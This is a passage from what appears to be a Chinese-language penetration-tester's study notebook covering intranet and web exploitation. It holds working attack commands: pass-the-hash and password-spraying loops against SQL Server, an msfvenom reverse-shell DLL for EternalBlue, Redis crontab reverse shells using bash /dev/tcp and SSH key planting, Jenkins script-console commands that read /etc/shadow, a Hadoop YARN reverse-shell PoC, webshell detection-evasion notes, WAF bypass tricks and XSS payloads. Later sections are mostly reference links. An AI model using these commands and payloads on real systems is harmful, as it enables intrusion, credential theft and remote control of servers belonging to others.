mssqlclient.exe dayu/sqladmin@192.168.3.73 -windows-auth

2)通過 socks代理,在linux環境下使用 windows認證模式,mssqlclient測試登陸 sqlserver服務器,賬號驗證通過后會直接返回 sql shell

proxychains python mssqlclient.py dayu/sqladmin@192.168.x.x -windows-auth

3)通過 socks代理,以mssql賬號驗證方式測試登陸mssql服務器,賬號驗證成功后執行mssql. txt內的sql命令

proxychains python mssqlclient.py ./sa:admin@192.168.x.x -file mssql.txt

4)通過 socks代理,在linux環境下使用 windows認證模式,mssqlclient測試登錄sqlserver服務器,賬號驗證成功后執行 command.txt內的sql命令

proxychains python mssqlclient.py -p 1433 dayu/sqladmin:123456@192.168.x.x -windows-auth -file cpmmand.txt

5)在windows環境下使用windows認證模式,使用ntlm hash驗證方式,mssqlclient測試登陸sqlserver服務器,賬號驗證成功后執行command.txt內的sql命令

mssqlclient.exe -p 1433 -hashes :"hash值" dayu/sqladmin@192.168.x.x -file command.txt -windows-auth

同樣也可以用于webshell環境下

批量檢測

除此之外,還可以批量檢測內網 SQL server服務器的賬號安全性
需要準備的文件有:

mssqlclient.exe(必須) command.txt(必須)

以下四個文件需選其一:

hashes.txt (需驗證的 ntlm hash字符串列表) username.txt(需驗證的 username列表) password.txt(需驗證的密碼字符串列表) Ips.txt (需驗證的p字符串列表)

舉例以下幾種批量檢測的bat腳本內容

1)測試以 windows認證模式,使用hash傳遞驗證,使用 mssqlclient批量測試登陸 sqlserver服務器,Ips.txt 內容為待檢測sqlserver服務ip,每行一條

FOR /F %%i in (ips.txt) do mssqlclient.exe -p 1433 -hashes :hash值 ......

2)測試以 windows認證模式,使用hash傳遞驗證,指定主機 ntlm hash遍歷驗證,hashes.txt為待檢測已知 ntlm hash內容,每行一條

FOR /F %%i in (hashes.txt) do mssqlclient.exe -p 1433 -hashes %%i domain/adminis.......

3)測試以 sqlserver認證模式,指定待檢測主機,遍歷驗證 passwords.txt 內密碼有效性,passwords.txt為已知密碼內容,每行一條,驗證成功后執行 command.txt內sql命令

FOR /F %%i in (passwords.txt) do mssqlclient.exe -p 1433 ./sa:%%i@192.168.x.x ....

4)測試以 sqlserver認證模式,指定待檢測密碼,遍歷驗證ip.txt內所有服務器,ip.txt為待檢測sqlserver服務器,每行一條,驗證成功后執行 command. txt內sql命令

FOR /F %%i in (ips.txt) do mssqlclient.exe -p 1433 ./sa:password123@%%1i -file ......

這四種命令補全查看前面的講解即可,或者查看參考資料

參考資料:

https://github.com/SecureAuthCorp/impacket --下載 https://www.puckiestyle.nl/impacket/ https://github.com/SecureAuthCorp/impacket/issues/613

2.2.1.3 MS17010py腳本利用

前言

因為有些機器存在漏洞,但是使用MSF的模塊利用失敗,而使用py腳本則能成功利用

利用

在本地用虛擬機搭建了Kail 和 Windows7系統

windwos7靶機IP:192.168.175.138

生成木馬dll

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.175.138 lport=6666 -f dll > 64.dll


py下載地址:fb.py

https://github.com/misterch0c/shadowbroker/tree/master/windows

1)設置ip
2)Use Eternalblue使用 Eternalblue插件
3)Use doublepulsa使用 doublepulsar插件
4)最后執行dll反彈shell
操作步驟不截圖了挺簡單的…


2.2.2 未授權訪問漏洞

這類問題覆蓋的應用、利用方式較廣,因此只舉例頻次較高的漏洞

Redis

Redis是一個開源的使用ANSI C語言編寫、支持網絡、可基于內存亦可持久化的日志型、 Key-Value數據庫

reds-cli

redis-cli -h 172.16.x.x -p 6379

如何寫入文件

172.16.x.x:6379 > CONFIG GET dir 1) "dir" 2) "/usr/local/var/db/redis" 172.16.x.x:6379 > CONFIG set dir /tmp/ OK 172.16.x.x:6379 > SET foobar "who are you? Rvnoxsy" OK 172.16.x.x:6379 > CONFIG GET dbfilename 1) filename 2) dump.rab 172.16.x.x:6379 > CONFIG SET dbfilename write_file.log OK 172.16.x.x:6379 > save OK

反彈shell-Linux

127.0.0.1:6379 > set shell "\n* * * * * bash -i >& /dev/tcp/1.1.1.1/88 0>&1\n" OK 127.0.0.1:6379 > config set dir /var/spool/cron/ OK 127.0.0.1:6379 > config set dbfilename root OK 127.0.0.1:6379 > save [238] xx May xx:xx:xx DB saved on disk OK

寫入公鑰
生成公鑰:

ssh-keygen-t rsa --一直回城即可 127.0.0.1:6379 > config set dir /root/ssh/ OK 127.0.0.1:6379 > config set dbfilename authorized_keys OK 127.0.0.1:6379 > set x "\n\n\nssh-rsa xxxxxx root@kali\n\n\n" OK 127.0.0.1:6379 > save OK

操作完記得情況數據庫

172.16.x.x:6379 > FLUSHALL

2.2.2.1未授權漏洞總結

未授權漏洞

Redis

計劃任務反彈shell

利用計劃任務執行命令反彈shell

在redis以root權限運行時可以寫crontab來執行命令反彈shell
先在自己的服務器上監聽一個端口

nc -lvnp 6666

然后執行命令:

redis-cli -h 192.168.x.x 192.168.x.x:6379 > set x "\n* * * * * bash -i >& /dev/tcp/192.168.x.x/6666 ... 192.168.x.x:6379 > config set dir /var/spool/cron/ 192.168.x.x:6379 > config set dbfilename root 192.168.x.x:6379 > save

寫入公鑰
獲取rsa

ssh-keygen -t rsa

將公鑰寫入foo.txt,注意內容前后要加2個換行

echo -e "\n\n"; cat /root/ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

將foo.txt放入鍵crackit里

cat foo.txt redis-cli -h IP -x set crackit

連接目標

redis-cli -h Ip

設置目標的redis的配置文件
設置數據庫備份目錄為/root/.ssh/

192.168.X.X: 6379 > config set dir /root/.ssh/

設置數據庫備份文件名為authorized_keys

192.168.X.X:6379 > config set dbfilename authorized_keys

此時公鑰成功寫入目標機子,文件名為authorized_keys

192.168.x.x:6379 > save

利用私鑰鏈接目標

ssh -i /root/.ssh/id_rsa root@192.168.x.x set x "\n\n\n

參考資料:

https://segmentfault.com/a/1190000009811404 https://github.com/andymccurdy/redis-py

Jenkins

默認是8080端口未授權訪問就是任意用戶都能訪問都能執行命令

127.0.0.1:8080/jenkins/manage 127.0.0.1:8080/jenkins/script

常用命令集合:

println "whoami".execute().text

Linux:

println ifconifg -a".execute().text println "cat /etc/passwd".execute().text printin"cat /etc/shadow".execute().text

Windows:

println "ipconfig /all".execute().text def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'ipconfig'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

靶機有漏洞復現,遇到了執行命令即可…


Mongodb

利用可視化工具連接默認端口:28017
推薦Robo3t 1.1 即可

python mongodb_unauth.py

coding:utf-8 mongodb未授權檢測腳本 usage: python3 mongodb_unauth.py ip port 默認端口28017和27017from pymongo import MongoClient import sysip = sys.argv[1] port = int(sys.argv[2]) try:conn = MongoClient(ip, port, socketTimeoutMS=5000) #連接 MongoDB,延時5秒dbs = conn.database_names()print('[ok] -> {}:{} database_names : {}'.format(ip, port, dbs))conn.close() except Exception as e:error = e.argsprint('[-] -> {}:{} error : {}'.format(ip, port, error)) python3 mongodb_unauth.py 192.168.175.1 27017

ZooKeeper

默認端口:2181、2171

ls / #查看所有節點 get / #獲取某個節點信息

參考資料:

https://blog.csdn.net/lihao21/article/details/51778255 https://www.cnblogs.com/wushijin/p/11654076.html

腳本檢測

# coding=utf-8 import socketdef get_plugin_info():plugin_info = {"name": "Zookeeper未授權訪問","info": "Zookeeper Unauthorized access","level": "中危","type": "未授權訪問","author": "c4bbage@qq.com","url": "https://hackerone.com/reports/154369","keyword": "server:Zookeeper","source": 1}return plugin_infodef check(ip, port, timeout):try:socket.setdefaulttimeout(timeout)s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip, int(port)))flag = "envi"# envi# dump# reqs# ruok# stats.send(flag)data = s.recv(1024)s.close()if 'Environment' in data:return u"Zookeeper Unauthorized access"except:passdef main():ip = "1.1.1.1"print check(ip, 2181, 2)if __name__ == '__main__':main() https://github.com/ysrc/xunfeng/tree/master/vulscan/vuldb

Elasticsearch

默認端口:9200

http://localhost:9200/_plugin/head/ web管理界面 http://localhost:9200/_cat/indices htp:// localhost:9200/_river/_search 查看數據庫敏感信息 http://localhost:9200/_nodes 查看節點數

腳本檢測:

# coding:utf-8 # elasticsearch未授權檢測腳本 # author:ske # usage: python3 elasticsearch_unauth.py ip port # 默認端口9200 # http://localhost:9200/_plugin/head/ web管理界面 # http://localhost:9200/_cat/indices # http://localhost:9200/_river/_search 查看數據庫敏感信息 # http://localhost:9200/_nodes 查看節點數據import sys from elasticsearch import Elasticsearch import requests import jsonip = sys.argv[1] port = int(sys.argv[2]) # 9200 try:es = Elasticsearch("{}:{}".format(ip, port), timeout=5) # 連接Elasticsearch,延時5秒es.indices.create(index='unauth_text')print('[+] 成功連接 :{}'.format(ip))print('[+] {} -> 成功創建測試節點unauth_text'.format(ip))es.index(index="unauth_text", doc_type="test-type", id=2, body={"text": "text"})print('[+] {} -> 成功往節點unauth_text插入數據'.format(ip))ret = es.get(index="unauth_text", doc_type="test-type", id=2)print('[+] {} -> 成功獲取節點unauth_text數據 : {}'.format(ip, ret))es.indices.delete(index='unauth_text')print('[+] {} -> 清除測試節點unauth_text數據'.format(ip))print('[ok] {} -> 存在ElasticSearch未授權漏洞'.format(ip))print('嘗試獲取節點信息:↓')text = json.loads(requests.get(url='http://{}:{}/_nodes'.format(ip, port), timeout=5).text)nodes_total = text['_nodes']['total']nodes = list(text['nodes'].keys())print('[ok] {} -> [{}] : {}'.format(ip, nodes_total, nodes))except Exception as e:error = e.argsprint('[-] -> {} error : {}'.format(ip, error)) python3 elasticsearch_unauth.py 192.168.1.4 9200

Memcache

默認端口11211

提示連接成功表示漏洞存在

telnet <target> 11211,或 nc -vv <target> 11211

Memcached端口是對外開放的,用nc或Telne可以直接登錄,查看信息,增加修改都可以
修復建議

memcached設置監聽內網或配置防火墻限制非必要的遠程訪問

參考

https://www.cnblogs.com/mrhonest/p/10881389.html

Hadoop

Hadoop是一個由Apache基金會所開發的分布式系統基礎架構
用戶可以在不了解分布式底層細節的情況下,開發分布式程序
充分利用集群的威力進行高速運算和存儲
在默認情況下,Hadoop允許任意用戶訪問管理接口

poc:

#!/usr/bin/env pythonimport requeststarget = 'http://127.0.0.1:8088/' lhost = '192.168.220.137' # put your local host ip here, and listen at port 9999url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,},},'application-type': 'YARN', } requests.post(url, json=data) 修改exploit.py中的反彈IP python exploit.py

HDFS

NameNode 默認端口 50070 DataNode 默認端口 50075 httpfs 默認端口 14000 journalnode 默認端口 8480

YARN (JobTracker )

ResourceManager 默認端口 8088 Jobtracker 默認端口 50030 TaskTracker 默認端口 50060

Hue默認端口8080

YARN(JobTracker)

master 默認端口 6001 regionserver 默認端口 60030

hive- server2默認端口1000

spark- jdbcserver默認端口10003

開啟身份驗證,防止未經授權用戶訪問


Couchdb

默認端口5984

在local.ini配置中:
bind_address = 設置為0.0.0.0則存在未授權訪問

直接加端口進行訪問即可
exp:

https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py

Ldap

使用工具ldap admin直接連接即可

防御措施:

https://www.cnblogs.com/mrhonest/p/10948657.html --建議 https://blog.csdn.net/u011607971/article/details/86378361 --管理方法

未授權漏洞總結:

https://github.com/f1veT/VulScan/find/master --Vulscan https://github.com/ysrc/xunfeng/tree/master/vulscan/vuldb --vuldb

2.2.2.2 JBOSS未授權訪問

Jboss未授權訪問

vulhub漏洞平臺可以復現,啟用環境位置:vulhub-jboss-cve-2017-7504

docker-compose up -d

訪問8080端口無賬號密碼就可進入

linux-kali-exp

git clone https://github.com/joaomatosf/jexboss cd jexboss python jexboss py

python3 jexboss.py IP+port

執行工具會依次檢測一下項目,有漏洞就會顯示紅色的: VULNERABLE(易受攻擊的),工具就會根據找到容易受到攻擊的點,進行利用

然后選擇YES,就可以獲得shell了


2.2.3 遠程代碼執行漏洞

2.2.3.1 Java下奇怪的命令執行

前言

使用ProcessBuilder

ProcessBuilder pb=new ProcessBuilder(cmd); pb.start();

使用Runtime

Runtime.getRuntime().exec(cmd)

也就是說上面cmd參數可控的情況下,均存在命令執行的問題。但是話題回來,不太清楚大家是否遇到過java命令執行的時候,無論是windows還是linux環境下,帶有 |,<,> 等符號的命令沒辦法正常執行。所以今天就進入底層看看這兩個東西

差別
這里只講解下跟進 java. lang, Runtime#exec的構造方法,exec的構造方法有以下幾種情況,其實根據傳入的變量我們大概可以區分的了,一個是根據 String command,也就是直接傳入一個字符串,另一個是根據 String cmdarrayu[],也就是傳入一個數組

需要知道Runtime.getRuntime{}.exec{} 的底層實際上也是 ProcessBuilder

getRuntime{}.exec{} 如果直接傳入字符串會經過String Tokenizer的分割,進而破壞其原本想要表達的意思

https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html
詳細了解下這篇文章的講解

總結:

其實java已經盡量規避命令執行的安全問題,JDK沙盒機制會進行 checkExec,執行命令的機制就是僅僅檢查并執行命令數組中的第一個,而分隔符后面的所有東西都是默認為被執行程序的參數,所以 getRuntime().exec() 通過傳入字符串執行命令的時候,應該盡量避免使用空格,用了空格可能會改變這條命令本身想要表達的意思

所以在Java下如果遇到復雜的命令執行,且參數只能如下所示,且只有一個位置可以控制的話,建議使用base64的編碼方式,windows下可以使用 powershll的base64

Java的反序列化框架利用框架yso,以及一些shiro這類反序列化導致的命令執行實際上很多是用了getRuntime來達到命令執行的目的,且就像我們上面說的,可控位置比較固定,執行復雜命令會出現執行不了

Reference

sh-or-getting-shell-environment-from

2.2.3.2 Shiro反序列化記錄

漏洞搭建安裝和復現:

https://cloud.tencent.com/developer/article/1078421 https://blog.knownsec.com/2016/08/apache-shiro-java/

Reference

Pwn a CTF Platform with Java JRMP Gadget

https://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html https://open.appscan.io/article-862.html https://www.jianshu.com/p/f10ad968e1b2

強網杯“彩蛋— Shiro1.2.4(SHRO550)漏洞之發散性思考

該鏈接已失效,可查看書籍

Apache Shiro Java反序列化漏洞分析

https://blog.knownsec.com/2016/08/apache-shiro-java/ https://bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/

知識盲區,需要腦補!!!!!


2.2.3.3 RMI-反序列化

參考
RM官方文檔

https://xz.aliyun.com/t/4711#toc-3 ---淺顯易懂的JAVA反序列化入門 java安全漫談-04RM篇(1) ----如果看到可以找dayu我要 java安全漫談04.RM篇(2) --沒找到(2)....

知識盲區,需要腦補!!!!!


2.2.3.4 JNDI注入

參考:(哎,知識盲區,加油腦補)

https://www.freebuf.com/vuls/115849.html --Jndi注入及Spring RCE漏洞分析 https://www.veracode.com/blog/research/exploiting-jndi-injections-java --在Java中利用JNDI注入 https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html --如何繞過高版本JDK的限制進行JNDI注入利用

RPC

https://www.jianshu.com/p/2accc2840a1b --如何給老婆解釋什么是RPC https://www.freebuf.com/column/189835.html ---深入理解JNDI注入與Java反序列化漏洞利用

ldap

https://www.cnblogs.com/wilburxu/p/9174353.html --LDAP概念和原理介紹 https://www.jianshu.com/p/7e4d99f6baaf --LDAP入門 https://blog.csdn.net/caoyujiao520/article/details/82762097 --LDAP入門使用

2.2.3.5 fastjson漏洞淺析

前言

Fastion是一個Java語言編寫的高性能功能完善的JSON庫。它采用一種“假定有序快速匹配"的算法,把JS0N Parse的性能提升到極致,是目前Java語言中最快的JSON庫。 Fastjson接口簡單易用,已經被廣泛使用在緩存序列化、協議交互、We輸出、 Android客戶端等多種應用場景

參考鏈接

https://www.freebuf.com/column/207439.html ---如何繞過高版本JDK的限制進行JNDI注入

三個fastjson1.2…版本的poc,需要花很多時間來學習!!!


2.2.3.6 CVE-2019-11043 PHP遠程代碼執行復現

簡介

相信大家都在滿天的公眾號預警里面看過很多,這里就一筆帶過

2019年10月22日,國外安全研究員公開了一個PHP-FPM遠程代碼執行的漏洞EXP
該漏洞是 Andrew Danau在某比賽解決一道CTF題目時發現,向目標服務器URL發送%0a符號時,服務返回異常發現的漏洞

2019年9月26日,PHP官方發布漏洞通告其中指出使用 Nginx + php-fpm的服務器在部分配置下存在遠程代碼執行漏洞且該配置已被廣泛使用,危害較大,影響較為廣泛相關工具已經公開

Github地址如下:

https:/github.com/neex/phuip-fpizdam

方法很多,我會寫出來…后補!!!


2.2.3.7 java webshell從入門到入獄系列1-基礎篇

本系列文章純探討技術交流,請勿使用本文探的技術構造惡意webshel非法入侵他人網站

前言

本系列,主要從webshell基礎、 webshell的bypass技術(關鍵字、流量層、hook點逃逸)、后滲透的webshell維權(基于容器特性的隱式webshell、內存shell等)等方面和大家交流java中webshe‖的形式

基礎

java webshell種類

現在大部分中間件容器,所能支持解析的后綴,主要是jsp,jspx 兩種動態腳本為主,比如 tomcat容器中,默認能支持解析的動態腳本已經默認寫在配置中了

<jsp-config> <jsp-property-group> <url-pattern>*.jspx</url-pattern> <url-pattern>*.jsp</url-pattern><scripting-invalid>true</scripting-invalid> </jsp-property-group> </jsp-config>

在目前常見的 webshel的后門種類,主要分如下幾類:

各種客戶端的一句話 webshll (比如菜刀、冰蝎、蟻劍、c刀等常見客戶端)、專門負責數據傳輸的webshell(與數據庫進行交互)、Tune后門(基于 socks5協議的 reGeorg之類的)、小馬(單純的進行命令執行、單純的進行文件管理/上傳等功能)、大馬(集成了文件管理、命令執行、數據庫連接等多功能性大馬)

java執行命令方式

在這節我們拿最基礎的命令執行的來討論,如何用多種方式寫我們的負責命令執行的webshell

在java中,常見的能夠執行命令的方式

java基礎的webshell命令執行方式

使用 java runtime exec()

第一種常見的使,用 java.lang.Runtime 類進行執行系統命令,該方法也是目前市面上各種靜態查殺 webshell 輔助工具首要盯著的目標,需要注意的是win 下和linux 需要區別對待,以及當使用多個命令組合使用注意坑。下面我們來看看代碼。使用 Runtime類,調用exec執行命令返回一個Process對象,然后啟一個 BufferedReader類,對返回的結果進行保存回顯處理。執行exec的時候需要特別注意,帶有|,<,> 等符號的命令需要使用如下代碼的方式進行執行,要不然容易出錯

講解了webshell大部分能利用的機制:
Java 執行系統命令的方法和原理
用 ProcessBuilder 繞過檢測
使用 Java 反射機制繞過檢測
使用 Java 類加載機制繞過檢測
獲得 Class 對象的四種方法

https://cloud.tencent.com/developer/article/1180753 --利用Java反射和類加載機制繞過JSP后門檢測

非常詳細…

https://javasec.org/javase/ --安全門

熟悉下Java反射基礎:
定義:
java反射機制是在運行狀態中,對于任意一個類,都能夠知道這個類的所有屬性和方法;對
于任意一個對象,都能夠調用它的任意方法和屬性;這種動態獲取信息以及動態調用對象的功能稱為java語言的反射機制

java反射涉及的類:

cass類:代表類的實體,在運行的Java應用程序中表示類和接口 Field類:代表類的成員變量(類的屬性) Method類:代表類的方法 Constructor類:代表類的構造方法

Class類中常見使用的
1)獲取的類中的方法
for Name(String className):根據類名返回類的對象
getName():獲得類的完整路徑名字

2)獲取類中屬性相關

getFields():獲得所有公有的屬性對象
getDeclaredFields():獲得所有屬性對象(帶Declared的可以獲取到私有private)

3)獲得類中方法
getMethods():獲得該類所有公有的方法
getDeclaredMethod( String name, Class…<?> parameterTypes):獲得該類某個方法
getDeclaredMethods():獲得該類所有方法

Fed類常見使用的
equals(Object obj):屬性與ob相等則返回true
get(Object obj):獲得obj中對應的屬性值
set(Object obj, Object value):設置obj中對應屬性值

Method類

invoke(object obj, Object…args) 傳遞 object對象及參數調用該對象對應的方法

Constructor類

newInstance(Object…initargs):根據傳遞的參數創建類的對象


2.2.3.8 深究XMLdecoder (dayu-Third day)

Oracle關于這個 xmldecoder造成的漏洞的CVE編號分別是CVE2017-3506、CVE2017-10271、CVE2019-2725

最早關于CVE2017-3506的補丁只是根據 object標簽進行了限制

而根據文章中講解的繼承關系 object替換成void即可,它們實際上是不受影響的,因此便出現了CVE-2017-10271,而針對CVE-2017-10271的補丁限定了所有具有執行的節點

但這次CVE-2019-2725主要是class標簽,class標簽可代替 object標簽來生成對象,因此這次漏洞本質還是 xmldecoder的問題,而補丁也是針對class標簽來處理的

https://blog.csdn.net/fnmsd/article/details/89889144 --fnmsd作者-XMLDecoder解析流程分析 https://www.anquanke.com/post/id/180725 ---淺談Weblogic反序列化——XMLDecoder的繞過史

只是盲區,需要腦補!!!!


2.2.3.9 FastJson 反序列化學習

這篇文章總結的非常好:

http://www.lmxspace.com/2019/06/29/FastJson-反序列化學習/

Reference

fastjson-remote-code-execute-poc: https://github.com/shengqi158/fastjson-remote-code-execute-pocFastjson 1.2.24反序列化漏洞分析: https://www.freebuf.com/vuls/178012.htmlFastjson反序列化漏洞研究: https://www.cnblogs.com/mrchang/p/6789060.htmlFastjson反序列化之TemplatesImpl調用鏈: https://p0rz9.github.io/2019/05/12/Fastjson反序列化之TemplatesImpl調用鏈/

2.2.3.10 Oracle 數據庫安全思考之xml反序列化

學習文章非常詳細:

https://my.oschina.net/u/4587690/blog/4452199

參考:

http://obtruse.syfrtext.com/2018/07/oracle-privilege-escalation-via.html

2.2.3.11 Webshell繞安全模式執行命令

繞過方法總結:

http://www.91ri.org/8700.html

EXP和poc:

https://github.com/yangyangwithgnu/bypass_disablefunc_via_ld_preload

2.2.3.12 Java 下的XEE漏洞

該文章講解了java xml下大部分的XEE漏洞原因和防御:

http://www.lmxspace.com/2019/10/31/Java-XXE-總結/ --詳細看看 https://xz.aliyun.com/t/3372 --有多余時間可以看看

Reference

Java XXE注入修復問題填坑實錄: https://mp.weixin.qq.com/s/bTeJYzUN9T1u-KDZON5FiQ修不好的洞,JDK的坑——從WxJava XXE注入漏洞中發現了一個對JDK的誤會: https://mp.weixin.qq.com/s/bTeJYzUN9T1u-KDZON5FiQXML_External_Entity_Prevention_Cheat_Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#Java一個被廣泛流傳的XXE漏洞錯誤修復方案: https://gv7.me/articles/2019/a-widely-circulated-xxe-bug-fix/JAVA常見的XXE漏洞寫法和防御: https://blog.spoock.com/2018/10/23/java-xxe/

2.2.3.13 Solr Velocity模板遠程代碼復現及利用指南

https://www.secpulse.com/archives/117281.html --詳細復現防御 https://www.cnblogs.com/bmjoker/p/11778478.html https://govuln.com/topic/501/ --P牛解釋

2.2.3.14 Solr-RCE-via-Velocity-template

http://www.lmxspace.com/2019/11/03/Solr-RCE-via-Velocity-template/

Reference

用Intellij idea搭建solr調試環境: https://www.jianshu.com/p/4ceeb2c20002http://lucene.apache.org/solr/guide/6_6/velocity-response-writer.html

2.2.3.15 java webshell 從入門到入獄系列2-攻防對抗之Bypass-上篇

1)java反射bypass

2)反射的進階版,通過結合利用byte字節碼+反射的方式完全無任何痕跡的反射回顯命令執行馬

3)java 后門-unicode編碼


2.2.3.16 java webshell 從入門到入獄系列3-攻防對抗之Bypass-中篇

其他姿勢載入webshell的技巧tip

JavaWeb 隨機后門(遠程下載文件)

Java URLClassLoader 動態加載jar包 webshell

openrasp (開源應用運行時自我保護)Bypass


2.2.3.17 java webshell 從入門到入獄系列4-攻防對抗之Bypass-下篇

各家廠商早期針對流量層查殺 webshel的原理:

https://xz.aliyun.com/t/6550

2.2.3.18 Java反序列化過程深究(dayu-fourth day)

https://www.sohu.com/a/357066711_257305

CVE-2017-3248
CVE-2017-3248

防護建議

可以在resolveclass和resovleproxyclass增加一些反序列化利用類的黑名單檢查

2.2.3.19 Apache Slor不安全配置遠程代碼執行漏洞復現及jmx rmi利用分析

CVE-2019-12409

https://wemp.app/posts/008ae6ed-9eee-4fc4-911c-7c603c8b884a?utm_source=bottom-latest-posts

該文章詳細講解復現!!!


2.2.3.20 java命令執行小細節

http://www.baizhiedu.com/article/1029

學習查看知識點,廣告可以忽視!!!


2.2.3.21 JDK反序列化Gadgets-7u21

https://xz.aliyun.com/t/6884

詳細,真詳細的文章!!

參考

https://www.freebuf.com/vuls/175754.htmlhttps://b1ue.cn/archives/176.htmlhttps://gist.github.com/frohoff/24af7913611f8406eaf3https://sec.xiaomi.com/article/41https://www.cnblogs.com/rickiyang/p/11336268.html ---javassist使用全解析

2.2.3.22 Weblogic-T3-CVE-2019-2890-Analysis

https://xz.aliyun.com/t/6904

詳細復現!!


2.2.3.23 spring-boot-actuators未授權漏洞

https://www.jianshu.com/p/3162ce30a853 https://www.veracode.com/blog/research/exploiting-spring-boot-actuators

2.2.3.24 SEMCMS2.6后臺文件上傳漏洞審計

https://www.cesafe.com/html/6190.html https://www.yir6.cn/Web/347.html --Admin/SEMCMS_Upfile.php代碼分析

2.2.3.25 代碼審計之lvyecms后臺getshell

https://www.wenwenya.com/anquan/516051.html https://webcache.googleusercontent.com/search?q=cache:9JJuN-bvrgwJ:https://www.secshi.com/22396.html+&cd=3&hl=zh-CN&ct=clnk&gl=hk

2.2.3.26 Log4j-Unserialize-Analysis

https://xz.aliyun.com/t/7004 https://my.oschina.net/u/4587690/blog/4452130

兩篇文章內容一致!詳細介紹了CVE-2019-17571、CVE-2017-5645


2.2.3.27 JAVA反序列化- FastJson組件

https://xz.aliyun.com/t/7027

非常難,內容非常多!!!加油!!!這塊比較難


2.2.3.28 Spring-securiy-oauth2 (CVE-2018-1260)

https://blog.spoock.com/2018/05/13/cve-2018-1260/

文章內容復現類似,可分析查看…


2.2.4 WAF-bypass(dayu-Fifth day)

找真實IP,繞過CDN

云waf一般可以通過此方法繞過

識別CDN

ping www.baidu.com dig www.baidu.com nslookup www.baidu.com

或者使用站長工具查看IP是否唯一等

尋找真實的IP
DNS歷史解析記錄
尋找DNS歷史記錄,找到后修改hos文件即可:

http://site.ip138.com/www.baidu.com https://dnsdb.io/zh-cn/ https://x.threatbook.cn/ http://toolbar.netcraft.com/site_report?url= https://censys.io/ipv4?q=www.baidu.com http://viewdns.info/https://community.riskiq.com/home https://securitytrails.com/list/apex_domain/jgbz.baidu.com

RSS郵箱訂閱,查看郵件源碼
一般也會得到真實的IP地址,通過rss訂閱的方式,可以查找到訂閱的消息中真實IP
或者在原始信息-頭信息中(unknown[xx.xx.xx.xxIP])信息

服務器向外請求(DNSLOG)

https://www.cnblogs.com/Xy--1/p/12896599.html

同網段子域名信息
DNS服務器域名信息:

google Public DNS(8.8.8.8,8.8.4.4) OpenDNS(208.67.222.222,208.67.220.220) OpenDNS Family(208.67.222.123,208.67.220.123) Dyn DNS(216.146.35.35,216.146.36.36) Comodo Secure(8.26.56.26,8.20.247.20) UltraDNS(156.154.70.1,156.154.71.1) Norton ConnectSafe(199.85.126.10,199.85.127.10)

https降級繞過


參考文章:https://zhuanlan.zhihu.com/p/202628255


ssl問題繞過

所以選用一個WAF不支持但是服務器支持的算法,選用TLSv1 256 bits ECDHE-RSA-AES256-SHA。就可以是WAF無法識別導致繞過

curl --ciphers ECDHE-RSA-AES256-SHA https://waf-test.lab.local/ssl-cipher-test


WAF支持的算法如下:
SSLv3

SSL_RSA_WITH_NULL_MD5SSL_RSA_WITH_NULL_SHASSL_RSA_WITH_RC4_128_MD5SSL_RSA_WITH_RC4_128_SHASSL_RSA_WITH_DES_CBC_SHASSL_RSA_WITH_3DES_EDE_CBC_SHASSL_RSA_EXPORT_WITH_RC4_40_MD5SSL_RSA_EXPORT_WITH_DES40_CBC_SHA

TLS/1.0-1.2

TLS_RSA_WITH_NULL_SHA256TLS_RSA_WITH_AES_128_CBC_SHATLS_RSA_WITH_AES_256_CBC_SHATLS_RSA_EXPORT1024_WITH_RC4_56_MD5TLS_RSA_EXPORT1024_WITH_RC4_56_SHATLS_RSA_WITH_AES_128_CBC_SHA256TLS_RSA_WITH_AES_256_CBC_SHA256TLS_RSA_WITH_RC4_128_MD5 = { 0x000x04 }TLS_RSA_WITH_RC4_128_SHA = { 0x000x05 }TLS_RSA_WITH_DES_CBC_SHA = { 0x000x09 }

參考文章:

http://xdxd.love/2018/09/10/利用SSL問題繞過WAF文章分析/

method 繞過

1)改變method,get改post,post 改上傳(還有cookies傳值)
2)改變method為不規則,比如改get,post為HELLLOXX等(某些apache版本)

GET/xxx/?id=1+and+sleep(3) HTTP/1.1DigApis /xxx/?id=1+and+sleep(3)HTTP/1.1

**

Heard IP 繞過

(一般應用攔截,非WAF)

X-forwarded-for:127.0.0.1 X-remote-IP:127.0.0.1 X-originating-IP:127.0.0.1 x-remote-addr:127.0.0.1x-client-1p:127.0.0.1

Heard content-type 繞過

content-type為空 content-type改成其他的 content-type必須指定唯一一個類型,例如 application/ octet- stream(比如安全狗)content-type改成不規則的text/htm1xxxxxxContent-Type:multipart/form-data ; boundary=0000 Content-Type:mUltiPart/ForM-dATa;boundary=0000 Content-Type:multipart/form-datax;boundary=0000 Content-Type:multipart/form-data,boundary=0000 Content-Type:multipart/form-data boundary=0000 content-Type:multipart/whatever;boundary=0000content-Type:multipart/; boundary=0000content-Type: application/octet-stream;

XSS

基礎常用的常規語句

?id=alert(document['cookie']) ?id=";location=location.hash)//#0={};alert(0) ?id=%";eval(unescape(location))//#%0Aalert(0) ?id=<script<{alert(1)}/></script> ?id=<img src=x:alert(alt) onerror=eval(src) alt=0>?id=%3cscript%3ealert(1)%3c%2fscript%3c ?id=<a href="javas&#99;ript&#35;alert(1);">id=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e?id=<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>?id=1234&"><script>alert(1)</script>=1234 #參數名

直接在文件名例如asp、php后加即可繞過
參考文章:

https://www.cnblogs.com/lcamry/articles/5622244.html

SQL

簡單判別諸如點以及數據庫類型 :

